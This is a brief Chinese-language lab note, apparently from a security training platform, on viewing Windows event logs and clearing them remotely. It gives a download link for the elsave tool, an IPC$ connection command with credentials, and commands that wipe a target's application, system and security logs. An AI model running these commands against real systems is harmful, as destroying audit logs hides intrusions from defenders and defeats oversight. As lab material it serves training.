日志查看
(1) 啟動Windows實驗台,點擊:開始 - 控制面板 - 管理工具 - 事件查看器。
日志清除
(1) 刪除事件查看器中的日志
主機下載使用elsave清除日志工具
下載地址:http://tools.hetianlab.com/tools/Elsave.rar
先用ipc$管道進行連接,在cmd命令提示符下輸入 net use \\對方IP(實驗台IP)\ipc$ "密碼" /user:"用戶名";
連接成功后,開始進行日志清除。
清除目標系統的應用程序日志輸入elsave.exe -s \\對方ip -l "application" -C
清除目標系統的系統日志輸入elsave.exe -s \\對方IP -l "system" -C
清除目標系統的安全日志輸入elsave.exe -s \\對方IP -l "security" -C
輸入如下圖
沒有文件?????
